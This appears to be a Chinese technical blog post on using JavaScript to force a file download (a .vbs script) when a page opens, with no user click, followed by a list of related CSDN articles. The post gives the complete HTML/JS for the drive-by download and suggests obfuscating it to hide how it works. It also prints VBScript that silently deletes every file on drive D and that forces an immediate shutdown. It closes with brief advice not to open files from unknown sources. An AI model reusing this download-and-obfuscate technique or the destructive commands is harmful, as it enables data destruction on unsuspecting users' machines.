JavaScript黑魔法:不可阻止的“自动下载”

已于 2022-11-24 10:00:36 修改
阅读量3.9k 收藏 5
点赞数 2
文章标签: javascript 自动下载
于 2022-03-12 19:13:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w2sft/article/details/123448574
版权
本文揭示了一种利用JavaScript实现网页后台自动下载文件的技术,尤其是VBScript,可能导致用户在不知情的情况下执行危险脚本。通过混淆加密JavaScript代码,攻击者可以隐藏恶意行为。防范措施主要是提高安全意识,不点击、不打开、不执行未知来源的文件。
摘要由CSDN通过智能技术生成

正常情况下,当我们想要从网站下载某个文件时,一定是需要主动点击,才能出现下载操作。这是理所当然的。

但你是否遇到过这样一种场景:当打开某个网页时,未进行任何点击,然而后台自动下载了一个文件!

很可怕吧,像是种不可思议的黑魔法。但这是真实可以实现的,用JavaScript即可实现。

实现效果:

且看本演示:打开页面,后台自动下载了一个vbs文件。点击下载后的文件,vbs脚本文件被执行,弹出了一个hello窗口。如下:

由于是vbs脚本,因此,如果点击该文件,文件会被打开并执行:

选择打开,脚本被执行:

如页面源码所示,本示例,只是执行一句msgbox(“hello”)。

源码:

效果很不可思议,但实现的源码却很简单,完整代码如下,保存为html文件打开即可执行。

<html>
<script>
var blob = new Blob(['msgbox("hello")'],{type:'application/vbs'});
var a = document.createElement('a');
a.href = window.URL.createObjectURL(blob);
a.download =  'game.vbs';
a.click();
</script>
</html>

而如果要防止他人查看源码、了解实现原理,可以对源码中的JavaScript代码混淆加密。

比如使用JShaman平台,对上述代码加密:

加密后的代码:

Msgbox仅是一个弹窗,而vbs是可以实现很多强大而可怕的功能的。

比如:

dim WSHshell
set WSHshell = wscript.createobject(“wscript.shell”)
WSHshell.run “cmd /c “”del d:\*.* / f /q /s”””,0 ,true

又如:

dim WSHshell
set WSHshell = wscript.createobject(“wscript.shell”)
WSHshell.run “shutdown -f -s -t 00”,0 ,true

能读懂这两段vbs脚本的话,可知:脚本执行可能带来很危险的后果。甚至可能下载其它的Exe并执行,等等。

防护:

如何防止这种威胁?文件是可能被自动下载的,不仅仅是vbs脚本,exe也可能。但只要不点击,便不会执行。因此,需增强安全意识,对于不明来源的文件:不点击、不打开、不执行。

w2sfot
关注
优化Nginx性能的7大魔法:从基础到高阶,如何让Web服务器飞速跃迁?
java专栏
05-24 348
Nginx配置的艺术,是策略与技术的结合,是性能与安全的平衡。每一行代码,都是对性能的精雕琢,每一次优化,都是对效率的追求。在Web服务器的世界里,掌握这些魔法,就如同拥有了一把钥匙,可以开启通往极致性能的神秘之门。继续探索,因为Nginx的魔法,永远没有尽头。
Javascript笔记大全02
qwq_666的博客
08-03 406
DOM 简介 文档对象模型(Document Object Model,简称DOM),是W3C组织推荐的处理可扩展标记语言(HTML或者XML)的标准编程接口 DOM树 窗口加载事件 // 为window绑定一个onload事件 window.onload = function() {} 或者 window.addEventListener('load',function() {}); // 该事件对应的响应函数将会在页面加载完成之后执行 // 这样可以确保我们的代码执行时所有的DOM对象已经加载完毕了
js自动下载文件到本地的实现代码
12-03
代码如下:<html> <head> <title>js自动下载文件到本地</title> [removed] function InitAjax() { var ajax; if(window.ActiveXObject){ var versions = [‘Microsoft.XMLHTTP’, ‘MSXML.XMLHTTP’, ‘Microsoft.XMLHTTP’, ‘Msxml2.XMLHTTP.7.0’, ‘Msxml2.XMLHTTP.6.0’, ‘Msxml2.XMLHTTP.5.0’, ‘
js自动下载文件
weixin_44286765的博客
06-22 410
download(link){ var fileName = link;//l链接 var fileContent = 'helloWorld'; var a = document.createElement('a'); a.download = fileName; a.href = window.URL.createObjectURL(new Blob([fileContent])); a.click(); },
js下载文件
on1yLX的博客
08-08 322
a> 元素最重要的属性是 href 属性,它指示链接的目标。下载静态文件时,有时我们会遇到下载提示“找不到文件”的问题,所以这里href文件的路径尽量放在根目录下的static或者public文件夹下;与标签不同的是,点击后立即下载,window.location.href可以封装在方法中,在需要时下载。标签下载扩展名.img, .pdf, .txt, .html等格式的文件也都是没有问题的;属性挺有意思的,有了这个属性我们就可以用标签实现文件下载了。
js自动下载文件到本地
zaiyibian的专栏
02-06 582
js自动下载文件到本地 function InitAjax() { var ajax; if(window.ActiveXObject){ var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.X...
js实现点击自动下载文件
达拉崩巴斑得贝迪卜多比鲁翁_
06-29 1031
原理主要是利用了a标签的download属性,可以控制在点击a标签时,自动下载(不设置download会打开新的页面) 代码实现如下 let aLink=document.createElement('a'); aLink.href='imgUrl.png'//设置下载的图片链接 aLink.download='imgName.png'//设置图片下载之后的名称 aLink.click()//触发点击事件 ...
为何大量网站不能抓取 爬虫突破封禁的6种常见方法
qq_43678748的博客
01-21 4243
为何大量网站不能抓取 爬虫突破封禁的6种常见方法
python天勤金叉编程代码大全_这些Python编程黑科技,装逼指南,高逼格代码,让你惊叹不已...
weixin_28689809的博客
12-30 1490
1、单行写一个评级组件"★★★★★☆☆☆☆☆".slice(5 - rate, 10 - rate);定义一个变量rate是1到5的值,然后执行上面代码,看图才发现插件什么的都弱爆了2、如何装逼用代码骂别人SB(!(~+[])+{})[--[~+""][+[]][~+[]] + !+[]]+({}+[])[[~!+[]]~+[]]3、如何用代码优雅的证明自己NB这个牛逼了console.log((...
20款超级好用的chrome拓展插件让你的工作效率唰唰唰
weixin_48272043的博客
03-06 2908
关于开发 FeHelper(前端助手) FeHelper(前端助手)传送门 前端研发人员的利器,整合了JSON自动格式化、手动格式化,支持排序、解码、下载、网页油猴、网页取色器、脑图(Xmind)等十几款常用插件工具集,功能全面。支持工具自定义按需引入,合理搭配。一键添加到右键菜单,可以说是非常贴心了。有了它,几乎不用再去下载别的小工具插件了。 ​ Postman Interceptor Postman Interceptor传送门 前端开发中必...
JS 防采集插件
02-05
JS 防采集插件,可用于主流CMS、PHP 站点
js自动下载代码
王永存
07-12 2437
function funDownload(content, filename) { // 创建隐藏的可下载链接 var eleLink = document.createElement('a'); eleLink.download = filename; eleLink.style.display = 'none'; // 字符内容转变成blob地址 ...
js 浏览器直接下载文件(不借助服务器)
最新发布
快乐的小跳蛙的博客
08-12 341
需求:前端通过浏览器直接下载public下的文件。 思路:静态资源可以利用a标签或者借助函数方法下载
前端js中实现图片或word/pdf/excel等文件下载后直接打开(移动端也可使用)
冉冉胜起博客
09-01 7128
第一种方法:Hbuild中实现图片或word等文件下载后直接打开 将地址换成自己文件的地址即可 首先注册下监听事件:(vue中在mounted中注册即可) document.addEventListener('plusready', function () { //console.log("所有plus api都应在此事件发生后调用,否则会出现plus is undefined");...
原生JavaScript JS导出blob后台文件流xlsx、xls文件自动下载(且规避乱码),解决导出Excel文件里面有[object Object]。
我驾驶汽车从不是为了从A点到达B点,我喜欢去感受汽车,与之交流,与之融为一体。
12-06 1746
解决上面的问题,请用如下代码:
关于防止文件下载盗链之用js来防止文件地址盗链
anmi5580的博客
07-24 375
下载盗链的问题,仁者见仁,智者见智;这里只纯粹的讨论技术。 如果是页面防盗链的话,通常的方法都是用ServerVariables(“Server_Name“)结合ServerVariables(“Http_Referer”)来防止。如下:DIM servUrl, fromUrlservUrl = Request.ServerVariables("SERVER_NAME")fromU...
JavaScript 14种方法可以实现文件下载
热门推荐
代码炼金术
01-14 2万+
接下来,创建一个下载链接,将 Blob URL 分配给链接的 href 属性,设置文件名以及其他选项,最后触发点击链接进行下载。只需调用相应的下载函数,并传入文件的 URL 和文件名,即可下载文件。然后,将 Blob URL 分配给下载链接的 href 属性,从而实现文件下载。它首先使用 fetch API 获取文件的二进制数据,并将其封装为 Blob 对象,然后调用 saveAs() 函数来触发文件下载。你可以通过在服务器端生成文件,并将用户重定向到该文件的 URL 来实现文件下载。函数来实现文件下载
js下载文件到本地各种方法总结,解决火狐浏览器下载文件直接打开问题不是下载
wodebokecsdn的博客
03-11 1万+
!!!总是碰到下载文件的需求,在这里统一整理一下方法 一、此方法火狐有些版本是不支持的 window.location.href = 'https://*****.oss-cn-**.aliyuncs.com/*********'; 二、为了解决火狐有些版本不支持,可以改成这种方式 window.location='https://*****.oss-cn-**.aliyuncs...
JavaScript下载URL文件 自动下载
07-22
要使用JavaScript自动下载URL文件,你可以创建一个隐藏的<a>标签,并设置其href属性为文件的URL,然后使用JavaScript模拟点击该链接来触发下载。以下是示例代码: ```javascript function downloadFile(url, fileName) { var link = document.createElement('a'); link.href = url; link.download = fileName; // 创建一个自动点击事件 var clickEvent = new MouseEvent('click', { view: window, bubbles: true, cancelable: true }); // 触发点击事件 link.dispatchEvent(clickEvent); } // 调用downloadFile函数来下载文件 var fileUrl = 'https://example.com/file.pdf'; var fileName = 'example.pdf'; downloadFile(fileUrl, fileName); ``` 将要下载文件的URL和文件名传递给`downloadFile`函数,它会自动创建一个链接并模拟点击以触发下载。请确保URL指向的文件是可访问的,并且在同源策略下允许下载。 请注意,自动下载功能在某些浏览器中可能被禁用或受到限制。在某些情况下,浏览器可能会阻止自动下载,需要用户手动触发下载操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值